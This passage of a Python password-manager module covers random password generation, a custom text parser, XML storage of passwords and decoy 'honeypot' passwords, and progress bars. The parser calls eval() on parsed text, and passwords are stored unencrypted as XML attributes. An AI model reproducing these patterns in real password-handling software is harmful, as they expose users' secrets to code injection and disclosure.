return progress_bar(0.0, 100.0, no_pb_f, None)
def open_rng():
"""open_rng() - Open random(4) or urandom(4), returns an open file.
ERRORS
err_norandom(Exception) Cannot open random(4) or urandom.
"""
# Open /dev/urandom if /dev/random cannot be opened.
try:
f = open('/dev/random', 'rb')
except:
try:
f = open('/dev/urandom', 'rb')
except:
raise err_norandom('Cannot open "/dev/random" or "/dev/urandom".')
return f
def get64(length, pb=None):
"""get64(length)
Returns a random string containing A-Z a-z 0-9 underscore and
exclamation mark, with the length `length`.
ERRORS
err_nolength(Exception) Invalid `length`.
err_norandom open_rng()
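Illustrative use (a sketch; the returned value is random):
>>> len(get64(12)) == 12
True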
"""
# rng The random number generator '/dev/random'.
# passwd The password to be returned.
# number Integer used as a buffer/pipe between rng and passwd.
# bits The amount of bits left in 'number'.
if not is_int(length): # Check type.
raise err_idiot('get64 called with non-integer length.')
logging.info("get64: length={0}".format(length))
if length < 1:
raise err_nolength('get64 called with length < 1.')
if pb is None:
pb = no_pb()
letters=("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef" +
"ghijklmnopqrstuvwxyz0123456789!_")
passwd, bits, number = '', 0, 0
rng = open_rng()
while len(passwd) < length: # Main loop.
pb.progress(float(len(passwd))/float(length) * 100.0)
if bits < 6:
logging.info("get64: Need more random bits.")
number |= ord(rng.read(1)) << bits # Prepend the bits in number
# with a random byte.
bits += 8
passwd += letters[number % 64] # Use 6 bits to pick a letter and...
# ...append.
number >>= 6
bits -= 6
logging.info("get64: Added char {0}/{1}.".format(len(passwd), length))
rng.close()
del letters, bits, number, rng
return u(passwd)
def get10(length, pb=None):
"""get10(length)
Returns a random string containing 0-9, with the length `length`.
Raises the same exceptions as get64().
"""
# rng The random number generator '/dev/random'.
# passwd The password to be returned.
# number Integer used as a buffer/pipe between rng and passwd.
# bits The amount of bits left in 'number'.
if not is_int(length): # Check type.
raise err_nolength('get10 called with non-integer length.')
logging.info("get10: length={0}".format(length))
if length < 1:
raise err_nolength('get10 called with length < 1.')
if pb is None:
pb = no_pb()
passwd, bits, number = '', 0, 0
rng = open_rng()
while len(passwd) < length: # Main loop.
pb.progress(float(len(passwd))/float(length) * 100.0)
if bits < 4:
# Prepend the bits in `number` with a random byte.
logging.info("get10: Need more random bits.")
number |= ord(rng.read(1)) << bits
bits += 8
if (number%16) < 10:
# I don't want 0...5 to occur more frequently than 6...9.
passwd += chr(number%16 + 48) # digits ASCII
logging.info(
"get10: Added char {0}/{1}.".format(len(passwd), length))
else:
logging.info("get10: Bad nibble.")
number >>= 4 # Next nibble.
bits -= 4
rng.close()
del rng, bits, number
return u(passwd)
def getint(a, b, pb=None):
"""getint(a, b)
Return a random integer in the range `a` to `b` - 1 (inclusive).
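Illustrative use (a sketch; the returned value is random):
>>> 3 <= getint(3, 7) <= 6
True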
"""
assert is_int(a) and is_int(b)
if b <= a:
raise err_nolength("b <= a")
if pb is None:
pb = no_pb()
rng = open_rng()
reqbits = bits = number = smallnum = 0
while (1 << reqbits) < (b - a):
reqbits += 1 # How many bits are required?
number = b-a + 1 # Force loop.
while number >= (b - a): # Get a number in range.
logging.info("getint: Getting number...")
bits = number = 0
while bits < reqbits: # Need more.
if (reqbits - bits) < 8: # Prepend a few bits.
smallnum = ord(rng.read(1)) # Get byte.
smallnum %= 1<<(reqbits - bits) # Remove overflow bits.
number |= smallnum << bits # Prepend.
else: # Prepend a whole byte.
number |= ord(rng.read(1)) << bits
pb.progress(float(bits)/float(reqbits) * 100.0) # Progress bar.
bits += 8
rng.close()
return number + a
def unquote(x, esc=False):
"""unquote(x, esc=False) - Returns `x` without surrounding quotes.
Setting `esc` to `True` will make `unquote` return every character
behind a backslash without parsing them.
\'\"
\n\t\b\e Does not work.
>>> #This is Python 3.x
>>> import skogpasswdmanapi as api
>>> api.unquote('\t"Hello, world!" ')
'Hello, world!'
>>> api.unquote(' "Good bye cruel world!')
' "Good bye cruel world!'
>>> api.unquote('foobar')
'foobar'
>>> api.unquote("'foobar'")
'foobar'
"""
assert is_unicodestr(x)
the_output, the_input = "", []
for c in x:
the_input.append(c)
while True: # Skip all the whitespace.
try:
c = the_input.pop(0)
except:
return x
if not c in string.whitespace:
if c in "'\"": # First quote.
quote = c
break
return x # Not quoted.
while True: # Quoted string.
try:
c = the_input.pop(0)
except:
return x # String with a quote inside.
if esc and c == '\\':
# Simple escapes.
try:
c = the_input.pop(0)
except:
return x # String with a quote inside.
the_output += c
continue
if c == quote:
break # Possible end of string.
the_output += c
while True: # Skip the tail.
try:
c = the_input.pop(0)
except:
return the_output # Done.
if not c in string.whitespace:
return x # Bad tail.
def randomize(method, minlength, maxlength, pb=None):
"""randomize(method, minlength, maxlength)
Return random string with a length >= `minlength` and
<= `maxlength`.
`method`:
- "10" -> use get10()
- "64" -> use get64()
"""
assert is_int(minlength) and is_int(maxlength)
assert is_anystr(method)
if pb is not None:
getint_pb = pb.minibar(0.0, 10.0)
get6410_pb = pb.minibar(10.0, 100.0)
else:
getint_pb = get6410_pb = None
length = getint(minlength, maxlength+1, getint_pb)
# Even the length should be randomized.
if method == "10":
return get10(length, get6410_pb)
elif method == "64":
return get64(length, get6410_pb)
else:
raise err_nometa("weird 'method'")
class progress_bar():
"""class progress_bar()
pb = progress_bar(start=0.0, stop=100.0, function, data=None)
pb.progress(percent)
pb2 = pb.minibar(start, stop)
brain_dead_object = no_pb()
brain_dead_object.progress(percent)
brain_dead_object2 = brain_dead_object.minibar(start, stop)
Methods
-------
- progress(percent)
- minibar(start, stop)
start, stop and percent are floating point numbers in the range 0...100.
"""
def __init__(self, start, stop, function, data=None):
"""__init__(self, start, stop, function, data=None)
All values are float.
The values are internally in the range 0...1.
They are externally in the range 0...100.
`start` and `stop` are where 0% and 100% really are.
`function` is the function used to show progress.
`function` is ``function(percent, data)``.
`function`'s `percent` is the total progress in the range
0...100.
`function`'s `data` is the `progress_bar`-object's `data`.
`data` defaults to None and can be whatever you want.
"""
self.start = start/100.0
self.stop = stop/100.0
self.function = function
self.data = data
# Full range.
self.full = self.stop - self.start
def progress(self, percent):
"""progress(self, percent)
`percent` is in the range 0...100.
Show progress inside `self`'s range.
"""
if percent < 0.0:
percent = 0.0
if percent > 100.0:
percent = 100.0
real_percent = self.start + (percent/100.0 * self.full)
self.function(real_percent*100.0, self.data)
def minibar(self, start, stop):
"""progress_bar.minibar(self, start, stop)
A progress-bar that is a part of another (the parent)
progress-bar.
`start` and `stop` are where local-0% and local-100% are in the parent.
>>> import skogpasswdmanapi as api
>>> def simple_progress(percent, data):
... print(percent)
...
>>> pb = progress_bar(0.0, 100.0, simple_progress)
>>> pb.progress(0.0)
0.0
>>> pb.progress(50.0)
50.0
>>> pb.progress(100.0)
100.0
>>> minipb = pb.minibar(50.0, 100.0)
>>> minipb.progress(0.0)
50.0
>>> minipb.progress(50.0)
75.0
>>> minipb.progress(100.0)
100.0
"""
start /= 100.0
stop /= 100.0
return progress_bar(
(self.start + start*self.full) * 100.0,
(self.start + stop*self.full) * 100.0,
self.function,
self.data)
def parsetext_getvalue(s, *args):
'''
parsetext_getvalue(s, *args)
What is `s`?
Returns eval(s).
Single quoted: string
Triple quoted: string
int, float, complex
True, False, None
variables defined in the dicts passed as `args`
'''
# Remove leading whitespace.
# Numbers
# Variable
for i, c in enumerate(s):
if c not in ' \t':
break
s = s[i:]
## Strings.
#for n, sq, dq in [(3, "'''", '"""'), (1, "'", '"')]:
# if len(s) >= n * 2:
# if s[:n] in (sq, dq) and s[:n] == s[-n:]:
# return re.sub('\x01', "'", re.sub('\x02', '"', s[n:-n]))
## Numbers.
#numlist = []
#numtypes = ('int', 'float', 'complex')
#for x in numtypes:
# try:
# v = eval('{0}("{1}")'.format(x, s))
# except ValueError:
# v = None
# numlist.append(v)
## Choose the simplest.
#b = numlist[-1]
#for a in reversed(numlist[:-1]):
# if a != b:
# break
# b = a
#if b != None:
# return b
# The commented code above was from before the use of eval().
# They will come back when this can do stuff like get the value of a
# item in a list or dictionary without using eval().
# Variables
# None, True and False are added to the list of variables.
# It is only used internally, so eval() is not a big risk.
final = {}
for x in reversed(args):
for y in x:
try:
final[y]
except KeyError:
final[y] = x[y]
try:
return eval(s, final)
except:
raise SyntaxError('parsetext_getvalue: What is `{0}` ?'.format(s))
def parsetext_untext(text):
'''
for indent, line in parsetext_untext(text)
`indent` is an integer.
`line` is a string.
Escapes are translated.
Triple quoted strings have all of their lines joined with
newlines into a single output-line.
chr(1) is an escaped single quote.
chr(2) is an escaped double quote.
chr(3) is temporarily triple-single quote
chr(4) is temporarily triple-double quote
Comments, blank lines and trailing whitespace are removed.
'''
badbad = [(1, 'SOH'), (2, 'STX'), (3, 'ETX'), (4, 'EOT')]
for x in text:
for y, s in badbad:
if x == y:
raise SyntaxError(
'parsetext_untext: Choked on a {0}'.format(s))
# Backslash-newline.
skip = False
tmp_text = ''
for i, c in enumerate(text):
if skip:
skip = False
continue
if c == '\\':
skip = True
if text[i + 1] != '\n':
tmp_text += text[i:i + 2]
else:
tmp_text += c
# Triple quotes.
text = re.sub("'''", chr(3), re.sub('"""', chr(4), tmp_text))
tmp_text = ''
quote = ''
raw = False
for c in text:
if c == quote:
# End-quote.
if quote == chr(3):
tmp_text += "'''"
else:
tmp_text += '"""'
quote = ''
# Setting `raw` back to 0 drops the 'r'/'R' that started this raw string.
raw = 0
elif c in (chr(3), chr(4)):
# Start quote.
if c == chr(3):
tmp_text += "'''"
else:
tmp_text += '"""'
quote = c
elif quote:
# Quoted.
if c == '\n':
tmp_text += '\\n'
else:
if raw == 1 and c == '\\':
tmp_text += '\\\\'
elif raw == 2 and c == '\\':
tmp_text += '\\\\\\\\'
else:
tmp_text += c
else:
if raw == 1:
# Last character was a 'r' that didn't start a r'''*'''.
tmp_text += 'r'
raw = 0
if raw == 2:
tmp_text += 'R'
raw = 0
# raw and super-raw.
if c == 'r':
# If the following character is \x03
# or \x04: start a r'''*'''.
raw = 1
elif c == 'R':
raw = 2
else:
tmp_text += c
# Lines and escapes.
raw_lines = tmp_text.split('\n')
escaped_lines = []
del text
del tmp_text
escapes = {
'\\': '\\',
'n': '\n',
"'": chr(1),
'"': chr(2),
't': '\t'
}
for line in raw_lines:
skip = False
tmp_line = ''
for i, c in enumerate(line):
if skip:
skip = False
continue
if c == '\\':
skip = True
try:
tmp_line += escapes[line[i + 1]]
except KeyError:
raise SyntaxError(
"parsetext_untext: Unknown escape '{0}'".format(
'\\' + line[i + 1]))
else:
tmp_line += c
escaped_lines.append(tmp_line)
# Comments.
uncommented_lines = []
quote = ''
for line in escaped_lines:
for i, c in enumerate(line):
if quote:
if c == quote:
quote = ''
continue
else:
if c in ('"', "'"):
quote = c
continue
if c == '#':
uncommented_lines.append(line[:i])
break
else:
uncommented_lines.append(line)
del escaped_lines
# Blanks.
nonblanks = []
for line in uncommented_lines:
for c in line:
if c not in '\t ':
nonblanks.append(line)
break
del uncommented_lines
# Remove trailing whitespace.
trailfree = []
for line in nonblanks:
stop = 0
for i, c in enumerate(line):
if c not in '\t ':
stop = i
trailfree.append(line[:stop + 1])
del nonblanks
# Calculate indentation.
final = []
for line in trailfree:
indent = 0
for i, c in enumerate(line):
if c == ' ':
indent += 1
elif c == '\t':
indent += 8 - indent%8
else:
break
final.append((indent, line[i:]))
return final
def parsetext_list(text_list, *args):
'''
This is used by `parse_text`.
In `parse_text`:
``return parsetext_list(text_list, *args)``
'''
ret = []
list_item = []
dict_item = {}
normal_indent = None
while True:
# Get line.
try:
indent, line = text_list.pop(0)
except IndexError:
return ret
if normal_indent is None:
normal_indent = indent
if indent != normal_indent:
text_list.insert(0, (indent, line))
if indent > normal_indent:
list_item.append(parsetext_list(text_list))
continue
if indent < normal_indent:
return ret
# Next item in list.
if line[0] == '%':
if dict_item and list_item:
raise SyntaxError('dict and list hybrid not invented\n' +
'You are not expected to understand this:' +
' len(ret), indent = {0}, {1}'.format(len(ret), indent))
if list_item:
ret.append(list_item)
else:
ret.append(dict_item)
list_item = []
dict_item = {}
continue
# dict or list?
allowed = ''.join([
''.join([chr(x) for x in range(ord('0'), ord('9') + 1)]),
''.join([chr(x) for x in range(ord('A'), ord('Z') + 1)]),
''.join([chr(x) for x in range(ord('a'), ord('z') + 1)]),
'-_'
])
for c in line:
if c == ':':
# dict
break
if c not in allowed:
# list.
break
if c == ':':
key, value = line.split(':', 1)
if value:
dict_item[key] = parsetext_getvalue(value, *args)
else:
# value is a list.
try:
a, b = text_list.pop(0)
except IndexError:
raise SyntaxError(
'{0}: Expected a list, got an ^D'.format(key))
if not a > indent:
raise SyntaxError("{0}: The list isn't indented".format(
key))
text_list.insert(0, (a, b))
dict_item[key] = parsetext_list(text_list, *args)
else:
list_item.append(parsetext_getvalue(line, *args))
def parse_text(inp, *args):
'''
parse_text(text, *args)
Return a list of dicts from text.
The format is based on Stanza and Python.
args are dicts like locals() and globals().
\t \n \' \" \\ and backslash-newline.
Triple strings.
Note: SyntaxError()s are often caused by off-by-one errors and
small unnoticeable characters.
It works recursively with indentation: parse_text recurses when the
indentation increases and returns when it decreases.
# Indent properly
blah
blah
%
blah
%
%
#[[blah, [[blah]], [[blah]]]]
main:
[
[stuff], If no key: value
{stuff}, If only key: value
{} If empty
SyntaxError If mixed.
]
Indented stuff in a list or a dict will have a `main`.
'str'
'Hello world!'
'Good bye cruel world!'
%
'!dlrow olleH'
'!dlrow leurc eyb dooG'
%
%
key: 'value'
stuff:
key: value
number: 88
%
'alpha'
'beta'
%
%
# Will return:
[
[
'str',
[
[
'Hello world!',
'Good bye cruel world!'
],
[
'!dlrow olleH',
'!dlrow leurc eyb dooG'
]
]
],
{
'key': 'value',
'stuff': [
{
'key': 'value',
'number': 88
},
[
'alpha',
'beta'
]
]
}
]
'''
args = list(args)
args.append({
'True': True,
'False': False,
'None': None
})
args = tuple(args)
text_list = parsetext_untext(inp)
try:
return parsetext_list(text_list, *args)
except SyntaxError as e:
raise SyntaxError(
'From parse_text:\n{0}\nIndent:{1}\nLine:{2}'.format(
e, *text_list[0]))
class common_data():
"""class common_data():
`xmlfile` is a path.
All classes based on common_data are list-like with legs.
__init__(self, xmlfile, make_backups=True)
Variables
---------
self.index integer; __iter__ and __next__
self.data list
self.xmltree `xmlfile` is loaded into this.
self.xmlroot The <root> tag.
self.make_backups bool; will `writexml` generate a backup
in '~/.skogpasswdman/undoable/'.
Methods
-------
__iter__
__getitem__
__next__ = next
remove(x, xmlfile, element_name, attrib_name, is_numstring)
writexml(xmlfile, pb=None)
"""
def __init__(self, xmlfile, make_backups=True):
"""__init__(self, xmlfile)
This function is called by passwd.__init__ and honeypot.__init__ and
creates variables they both have. It loads them from the
path xmlfile -> self.xmltree -> self.xmlroot.
"""
# ~/.skogpasswdman/passwords or ~/.skogpasswdman/honeypots
assert is_anystr(xmlfile)
self.data = []
self.index = 0
self.make_backups = make_backups
try:
parser = XML.XMLParser(encoding="UTF-8")
except:
parser = XML.XMLParser() # Above will fail with Python 2.6.
self.xmltree = XML.parse(ope(xmlfile), parser)
self.xmlroot = self.xmltree.getroot()
# Sanity checking...
# Root tag.
if self.xmlroot.tag != "root":
raise err_loaderr(
"root element is not 'root' in '{0}'".format(xmlfile))
# Magic.
if not self.xmlroot.attrib["magic"] in ("skogpasswdman", "passwdman"):
raise err_loaderr("incorrect magic in '{0}'".format(xmlfile))
# Version.
version = self.xmlroot.attrib["version"].split('.', 2)
if int(version[0]) != 0:
raise err_loaderr("version too new in '{0}'".format(xmlfile))
if int(version[1]) > 1:
logging.warning("High version number '{0}' in '{1}'".format(
self.xmlroot.attrib["version"], xmlfile))
# Passwords/honey pots.
# The attribute "file" should have the value <basename of xmlfile>.
if self.xmlroot.attrib["file"] != os.path.basename(xmlfile):
raise err_loaderr("incorrect file magic in '{0}'".format(xmlfile))
logging.info("'{0}' is successfully loaded".format(xmlfile))
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index < len(self.data):
self.index += 1
return self.data[self.index - 1]
else:
raise StopIteration
def next(self):
return self.__next__()
def __getitem__(self, i):
return self.data[i]
def __len__(self):
return len(self.data)
def remove(self, x, xmlfile, element_name, attrib_name, is_numstring):
"""remove(self, x, xmlfile, element_name, attrib_name, is_numstring)
`x` is an integer used as an index xor a string. It can also be
a stringed integer.
It removes `x` from the file `xmlfile` and `self.data`.
It looks for a match in self.xmltree in the attribute
`attrib_name` in the tags `element_name`.
is_numstring == True:
`x` is a string of digits, not an integer.
Set is_numstring to True if `x` is NOT an index!
Raises err_notfound.
Example (from passwd.remove)
----------------------------
common_data.remove(self, x, "~/.skogpasswdman/passwords", "passwd",
"name", is_numstring)
"""
assert is_anystr(attrib_name) and is_anystr(element_name)
assert is_anystr(xmlfile)
if not is_numstring:
try:
x = int(x) # Is it a stringed integer?
except:
pass
if is_int(x):
y = 0
for z in self.xmlroot.findall(element_name):
# Loop through the XML.
if x == y: # y is the index.
del self.data[y]
self.xmlroot.remove(z)
common_data.writexml(self, xmlfile)
return
else:
y += 1 # Try next.
raise err_notfound("Not found.")
elif is_unicodestr(x):
y = 0
for z in self.xmlroot.findall(element_name):
# Loop through the XML
if z.attrib[attrib_name] == x: # Check for a match.
del self.data[y]
self.xmlroot.remove(z)
common_data.writexml(self, xmlfile)
return
else:
y += 1
raise err_notfound("not found")
else:
raise err_notfound("not integer and not unicode-string")
def writexml(self, xmlfile, pb=None):
"""writexml(self, xmlfile)
Write the XML tree (self.xmltree) to `xmlfile`.
It will add a backup to '~/.skogpasswdman/undoable/' if
`self.make_backups` is True."""
assert is_anystr(xmlfile)
self.xmlroot.text = "\n " # Make it look better.
self.xmlroot.tail = "\n"
if self.make_backups:
# Make backup.
os.rename(ope(xmlfile),
os.path.join(ope("~/.skogpasswdman/undoable"),
os.path.basename(xmlfile) + '-' + time.ctime()))
if pb is not None:
pb.progress(50.0)
try:
self.xmltree.write(ope(xmlfile), encoding="UTF-8",
xml_declaration=True)
except: # For Python 2.6.
self.xmltree.write(ope(xmlfile), encoding="UTF-8")
if pb is not None:
pb.progress(100.0)
def __del__(self):
"""Used by undo() and redo(). Make sure the object is 0xdeadbeef."""
del self.data
del self.index
del self.xmlroot
del self.xmltree
def __repr__(self):
return "<skogpasswdmanapi.common_data object with id {0}>".format(
id(self))
class passwd(common_data):
"""passwd(common_data) - The passwords.
All classes based on common_data are list-like with legs.
__init__(self, backups=True)
With `backups`=True changes can be undone.
Methods (including those from common_data)
------------------------------------------
add(name, value, m_type, m_minlength, m_maxlength, pb=None)
add_nometa(name, value)
remove(x, is_numstring=False)
mkindex(x, is_numstring=False)
update(index, pb=None)
update_meta(index, m_type, m_minlength, m_maxlength, pb=None)
__iter__
next = __next__
__len__
__getitem__
`passwd`'s entries are dicts
----------------------------
- 'name' What is the password for.
- 'value' The password.
- 'meta' The password's meta-data: a dict inside a dict.
The keys are needed for (re)`randomize`-ing the
password. See `add` and `update`.
- 'minlength' Minimal required length for the
password. Use int() on this.
- 'maxlength' Maximal allowed length for the
password. Use int() on this.
- 'type' String; Allowed characters in the
password. For :method:`update`.
- '10' Digits only.
- '64' A-Z, a-z, '_', '!'
- 'human' It was human-generated. The
password should have 0 as
minlength and maxlength.
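Example entry (a sketch; all values are hypothetical):
{'name': 'example.org',
'value': 'hunter2',
'meta': {'type': 'human', 'minlength': 0, 'maxlength': 0}}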
Internals
---------
xmltree A 'xml.etree.ElementTree.ElementTree'.
xmlroot A 'xml.etree.ElementTree.Element'. The 'root' tag.
writexml() Not so well hidden method inherited from common_data.
"""
def __init__(self, backups=True):
common_data.__init__(self, "~/.skogpasswdman/passwords", backups)
for passwd_element in self.xmlroot.findall("passwd"): # Get the data.
meta_element = passwd_element.find("meta")
# Got the tags/elements.
if meta_element is not None:
meta_attrib = {
"minlength": int(meta_element.attrib["minlength"]),
"maxlength": int(meta_element.attrib["maxlength"]),
"type": meta_element.attrib["type"]
}
else:
# The meta tag is optional.
# This is the magic dictionary.
meta_attrib = {
"minlength": 0,
"maxlength": 0,
"type": "human"
}
# Got the meta attributes.
self.data.append({
"name": passwd_element.attrib["name"],
"value": passwd_element.attrib["value"],
"meta": meta_attrib
})
def add(self, name, value, m_type, m_minlength, m_maxlength, pb=None):
"""add(self, name, value, m_type, m_minlength, m_maxlength)
Add the password for `name` with the value `value`. If `value`
is None then the password will be `randomize`d.
`m_type`
------
- "human" The password is some human generated password.
Cannot be `randomize`d.
- "10" It only contains digits.
- "64" It contains A-Z, a-z, 0-9, underscore and
exclamation mark.
`m_minlength` is the minimum length required for the password.
`m_maxlength` is the maximum length allowed for the password.
Raises err_duplicate if a password for `name` already exists.
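Illustrative calls (a sketch; names and values are hypothetical):
p = passwd()
p.add(u'example.org', None, '64', 8, 12) # randomized password
p.add(u'mailbox', u'hunter2', 'human', 0, 0) # human-chosen password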
"""
if is_int(m_minlength):
m_minlength = str(m_minlength)
if is_int(m_maxlength):
m_maxlength = str(m_maxlength)
assert is_anystr(m_minlength) and is_anystr(m_maxlength)
forget = int(m_minlength) # Raise an exception if not a number.
forget = int(m_maxlength) # Raise an exception if not a number.
if pb is None:
pb = no_pb()
for x in self.data: # Check for duplicates.
if x["name"] == name:
raise err_duplicate(
"passwd.add(name='{0}') #duplicate".format(name))
pb.progress(5.0)
if value is None:
value = randomize(m_type, int(m_minlength), int(m_maxlength),
pb.minibar(5.0, 90.0))
self.data.append({
"name": name,
"value": value,
"meta": {
"type": m_type,
"minlength": m_minlength,
"maxlength": m_maxlength
}
})
# Add new tags.
passwd_element = XML.SubElement(self.xmlroot, "passwd")
passwd_element.text = "\n " # Make them look better.
passwd_element.tail = "\n "
meta_element = XML.SubElement(passwd_element, "meta")
meta_element.tail = "\n "
# Attributes.
passwd_element.set("name", name)
passwd_element.set("value", value)
meta_element.set("type", m_type)
meta_element.set("minlength", m_minlength)
meta_element.set("maxlength", m_maxlength)
pb.progress(95.0)
common_data.writexml(self, "~/.skogpasswdman/passwords")
pb.progress(100.0)
def add_nometa(self, name, value):
"""add_nometa(self, name, value)
``self.add(name, value, "human", 0, 0)``
Add a password without meta-data.
"""
assert is_unicodestr(name) and is_unicodestr(value)
for x in self.data: # Check for duplicates.
if x["name"] == name:
raise err_duplicate(
"passwd.add_nometa(name='{0}') #duplicate".format(name))
self.data.append({
"name": name,
"value": value,
"meta": {
"type": "human",
"minlength": 0,
"maxlength": 0
}
})
passwd_element = XML.SubElement(self.xmlroot, "passwd")
passwd_element.tail = "\n "
passwd_element.set("name", name) #Attributes.
passwd_element.set("value", value)
common_data.writexml(self, "~/.skogpasswdman/passwords")
def remove(self, x, is_numstring=False):
"""remove(self, x, is_numstring=False)
Remove the password `x`.
`x` is an integer used as an index for `self.data` xor a string
xor a stringed integer (index).
`x` is what the password is for, not the value.
Set is_numstring to True if x is a string containing only
digits, but is NOT an index!
"""
common_data.remove(self, x, "~/.skogpasswdman/passwords", "passwd",
"name", is_numstring)
def mkindex(self, x, is_numstring=False):
"""mkindex(self, x, is_numstring=False)
Return the index of the password for `x`.
`x` is either an integer=index, a string to find xor a stringed
integer.
Set is_numstring to True if x is a string containing only
digits, but is NOT an index!
"""
index = 0
try:
if not is_numstring:
index = int(x) # That was very simple.
else:
raise
except:
assert is_unicodestr(x)
for y in self: # Find it.
if y["name"] == x:
return index
index += 1
raise err_notfound("")
return index
def update(self, index, pb=None):
"""update(self, index)
Update the password at index, use its meta-data to know how.
"""
assert is_int(index)
if index >= len(self) or index < 0:
raise err_notfound("index out of range")
try:
minlength = int(self[index]['meta']['minlength'])
maxlength = int(self[index]['meta']['maxlength'])
except:
raise err_idiot("INTEGERS")
method = self[index]["meta"]["type"]
if method == "human": # It would probably work with get64, but
raise err_nometa( # it will need a check for a meta-element and
# might need to create one.
# Use update_meta() to force specific meta-data.
"Don't know how to update a human-generated password.")
if pb is None:
pb = no_pb()
new = self[index]["value"] = randomize(method, minlength, maxlength,
pb.minibar(0.0, 90.0))
# Write the new password to the passwd file.
counter = 0
for element in self.xmlroot.findall("passwd"):
if counter == index: #Incremented enough?
element.set("value", new)
break
counter += 1
pb.progress(90.0 + (counter+1.0) / (index+1.0) * 5.0)
common_data.writexml(self, "~/.skogpasswdman/passwords",
pb.minibar(95.0, 100.0))
def update_meta(self, index, m_type, m_minlength, m_maxlength, pb=None):
"""update_meta(self, index, m_type, m_minlength, m_maxlength)
Update the password at index and its meta data.
"""
assert is_anystr(m_type)
assert is_int(index)
if index >= len(self) or index < 0:
raise err_notfound("index out of range")
try:
minlength = int(m_minlength)
maxlength = int(m_maxlength)
except:
raise err_idiot("INTEGERS")
if pb is None:
pb = no_pb()
new = self[index]["value"] = randomize(m_type, minlength, maxlength,
pb.minibar(0.0, 90.0))
self[index]["meta"]["type"] = m_type
self[index]["meta"]["minlength"] = m_minlength
self[index]["meta"]["maxlength"] = m_maxlength
# Write to the passwd file.
counter = 0
for element in self.xmlroot.findall("passwd"):
if counter == index: # Incremented enough?
element.set("value", new)
# Check meta.
meta = element.find("meta")
if meta is not None:
element.remove(meta)
# Create meta.
meta = XML.SubElement(element, "meta")
meta.set("type", m_type)
meta.set("minlength", str(m_minlength))
meta.set("maxlength", str(m_maxlength))
break
counter += 1
pb.progress(90.0 + (counter+1.0) / (index+1.0) * 5.0)
common_data.writexml(self, "~/.skogpasswdman/passwords",
pb.minibar(95.0, 100.0))
def __repr__(self):
return "<skogpasswdmanapi.passwd object with id {0}>".format(id(self))
class honeypot(common_data):
"""honeypot(common_data) - The honeypots.
All classes based on common_data are list-like with legs.
__init__(self, backups=True)
With `backups`=True changes can be undone.
Methods (including those from common_data)
------------------------------------------
add(value)
pick(n=1, sep=",", log_vs_raise=True, pb=None)
pickl(n, log_vs_raise=True, pb=None)
__iter__
next = __next__
__len__
__getitem__
A `honeypot`-object is list of strings.
Internals
---------
xmltree A 'xml.etree.ElementTree.ElementTree'.
xmlroot A 'xml.etree.ElementTree.Element'. The 'root' tag.
writexml() Not so well hidden method inherited from common_data.
"""
def __init__(self, backups=True):
"""__init__(self, backups=True)
Load ~/.skogpasswdman/honeypots -> self.xmltree
-> self.xmlroot -> self.data[].
self.data is a list of strings.
"""
common_data.__init__(self, "~/.skogpasswdman/honeypots", backups)
for honeypot_element in self.xmlroot.findall("honeypot"):
self.data.append(honeypot_element.attrib["value"])
def add(self, value):
"""add(self, value) - Add a new honey pot with the value `value`."""
assert is_unicodestr(value)
for x in self.data: # Check for duplicates.
if x == value:
raise err_duplicate(
"honeypot.add(value='{0}') #duplicate".format(value))
self.data.append(value)
honeypot_element = XML.SubElement(self.xmlroot, "honeypot")
honeypot_element.tail = "\n " # Make it look better.
honeypot_element.set("value", value)
common_data.writexml(self, "~/.skogpasswdman/honeypots")
def remove(self, x, is_numstring=False):
"""remove(self, x, is_numstring=False) - Remove an existing honey pot.
x is an integer used as index for self.data xor a string.
Set is_numstring to True if x is NOT an index!
"""
common_data.remove(self, x, "~/.skogpasswdman/honeypots", "honeypot",
"value", is_numstring)
assert not (_OLD_PICK_ and _NEW_PICK_), "Which pick?"
if _OLD_PICK_:
def pick(self, n=1, sep=",", log_vs_raise=True, pb=None):
"""pick(self, n=1, sep=",", log_vs_raise=True)
Pick `n` randomly selected honey-pots and separate them with
`sep`.
If `log_vs_raise` is True then `pick` will log an error if `n`
is too big. It will pick fewer fake-passwords than it is
supposed to.
If `log_vs_raise` is False it will raise `err_idiot`.
"""
assert is_unicodestr(sep) or sep == ","
# Its default is not unicode on Python 2.x.
return sep.join(self.pickl(n, log_vs_raise=log_vs_raise, pb=pb))
if _NEW_PICK_:
def pick(self, n=1, pb=None, **pickf_arg):
'''pick(self, n=1, pb=None, **pickf_arg)
Pick `n` randomly selected honey-pots.
If `pickf_arg` is not empty:
See `honeypot.pickf`.
Elif `n` is one:
This will return a string.
Else:
See `honeypot.pickl`.
'''
# pickf().
if pickf_arg:
return self.pickf(n, pb=pb, log_vs_raise=False, **pickf_arg)
# Single.
if n == 1:
return self.pickl(1, log_vs_raise=False, pb=pb)[0]
# Many.
return self.pickl(n, log_vs_raise=False, pb=pb)
def pickl(self, n, log_vs_raise=True, pb=None):
"""pickl(self, n, log_vs_raise=True)
Pick `n` randomly selected honey-pots and return a list.
If `log_vs_raise` is True then `pick` will log an error if `n`
is too big. It will pick fewer fake-passwords than it is
supposed to.
If `log_vs_raise` is False it will raise `err_idiot`.
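Illustrative use (a sketch; assumes at least three honeypots exist):
h = honeypot()
fakes = h.pickl(3)
# len(fakes) == 3 and every item is one of the stored honeypot strings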
"""
assert is_int(n)
if pb is None:
pb = no_pb()
if n > len(self):
n = len(self)
if log_vs_raise:
logging.error("honeypot.pick: <n> is too big.")
else:
raise err_idiot("n is too big!")
balloons, outlist, output = [], [], ""
for x in self: # Create popable list.
balloons.append(x)
while len(outlist) < n: # Pop random balloons.
s = float(len(outlist))
N = float(n)
outlist.append(balloons.pop(getint(0, len(balloons),
pb.minibar(s/N* 100.0, (s+1.0)/N * 100.0))))
return outlist
def pickf(self, n, **arg):
"""pickf(self, n,
pb = None,
pattern = "(['])",
replacement = r'\\\1',
sep = "', '",
head = "'",
tail = "'",
log_vs_raise = True
)
Pick `n` randomly selected honey-pots and return a string.
The string is prepended with `head` and appended with `tail`.
The honeypots are escaped with the regular expressions
`pattern` and `replacement`, and separated with `sep`.
If `log_vs_raise` is True then `pick` will log an error if `n`
is too big. It will pick fewer fake-passwords than it is
supposed to.
If `log_vs_raise` is False it will raise `err_idiot`.
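Illustrative result with the default arguments (a sketch; assumes the two
hypothetical honeypots 'alpha' and 'beta'):
"'alpha', 'beta'"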
"""
assert is_int(n)
defaults = {
'pb': None,
'pattern': r"(['\\])",
'replacement': r'\\\1',
'sep': "', '",
'head': "'",
'tail': "'",
'log_vs_raise': True
}
# Set to defaults if necessary.
for key in defaults:
try:
